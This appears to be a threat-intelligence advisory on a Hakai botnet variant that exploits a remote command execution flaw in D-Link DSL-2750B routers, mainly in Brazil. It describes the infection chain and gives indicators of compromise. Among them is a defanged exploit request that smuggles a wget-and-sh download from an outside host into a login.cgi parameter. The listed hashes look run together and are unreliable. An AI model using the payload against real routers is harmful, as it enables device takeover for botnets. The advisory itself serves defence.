Tempest’s monitoring team identified a quite active variant of Haikai botnet, attempting to exploit vulnerabilities in D-Link DSL-2750B routers in Latin America, particularly in Brazil.
This botnet has been detected by our sensors 134 times just this month and, so far, it is using 119 different IP addresses.
The infection method is the same as used by other botnets that have been widely reported by Tempest and other researchers. It takes advantage of a remote command execution vulnerability in which the attacker downloads a Shell Script file that runs on the device and, depending on the device architecture, will download the appropriate binary (hakai.mips, hakai.mpls, hakai. x86_x64). The binary uses a packer called UPX (Ultimate Packer for eXecutables), which is well known and open source, available on GitHub.
After the infection, the device connects to the attacker’s control panel and receives commands to attack or to attempt to infect other devices.
The control panel closely resembles to Gafgyt botnet, which had its source code released years ago and was also identified as LizardStresser — the botnet used by the Lizard Squad group in its DDoS-as-a-service. This variant is able to trigger HTTP, UDP, TCP and STD attacks. STD attacks occur when the attacker sends packets with a random payload of 1024 bytes.
IOCs
Payload:
GET /login.cgi?cli=aa aa’;wget hxxp://46[.]166[.]185[.]42/e -O -> /tmp/hk;sh /tmp/hk’
Payload source:
hxxp://46[.]166[.]185[.]42/e
Hash MD5:
0590e9af54485c9a94ed97ea1b7c022ce7a32ca82dca999437e5ebb4c76b676002baea1994dc58bbfa3bf7944629a6e3c288f1fa87225e61f0757fb9eaeb237c
Hash SHA256:
8ff5a8e20209267984ca4fe609ae7a8feccabda9114304c1444abc53cb169f5f3d98fd28c344b067e91881d06942f7532a1f4084d908d882d3975fe0709c85f59688a3fdfd8fcb2caa2962623af9cd64c2a74887057900dbca5179aef8c5f3194072d3b5393d86bf5b6586eec58efe79f3b5b428d183048968ad329fc982aa45
Unique IPs
115.211.158.127
151.25.16.155
151.67.179.72
151.70.150.145
156.194.16.10
156.194.186.237
156.194.226.4
156.194.41.138
156.195.200.13
156.196.179.29
156.196.185.140
156.196.200.81
156.196.242.173
156.197.171.232
156.198.221.75
156.199.204.140
156.199.77.123
156.201.79.16
156.203.178.17
156.204.155.113
156.205.135.43
156.205.195.104
156.206.115.220
156.209.198.100
156.209.232.198
156.209.54.177
156.210.187.42
156.211.96.230
156.212.13.107
156.212.209.151
156.212.214.221
156.212.98.46
156.213.104.172
156.213.169.78
156.213.173.45
156.213.244.171
156.213.99.66
156.216.224.31
156.217.140.86
156.217.50.123
156.218.75.76
156.219.145.253
156.219.192.162
156.219.229.182
156.220.127.23
156.220.138.137
156.220.143.93
156.220.253.82
156.220.44.52
156.221.116.143
156.221.123.7
156.221.148.113
156.221.172.223
156.221.5.177
156.223.130.168
156.223.165.48
156.223.95.196
187.64.72.94
197.246.180.121
197.32.137.152
197.32.8.123
197.34.56.237
197.38.130.42
197.38.71.15
197.39.86.166
197.41.204.206
197.42.132.154
197.42.33.96
197.44.8.66
197.46.178.52
197.51.1.213
197.52.14.196
197.52.168.225
197.54.198.40
197.54.98.170
197.55.65.76
197.55.80.40
197.57.173.100
197.58.121.102
197.58.237.253
31.194.147.178
41.230.140.29
41.232.65.213
41.234.237.128
41.235.138.212
41.235.183.103
41.238.179.235
41.238.9.217
41.239.164.80
41.35.24.91
41.36.188.159
41.36.244.219
41.36.248.103
41.36.30.115
41.37.27.36
41.38.139.146
41.39.39.33
41.41.112.189
41.42.150.61
41.42.205.120
41.44.103.75
41.44.127.25
41.44.196.33
41.44.3.243
41.44.53.155
41.44.56.89
41.45.128.60
41.45.143.5
41.45.182.174
41.46.143.91
41.46.243.97
41.47.49.254
79.129.7.154
79.24.80.194
80.15.21.65
80.183.8.179
83.28.135.202
85.72.59.101
94.70.161.249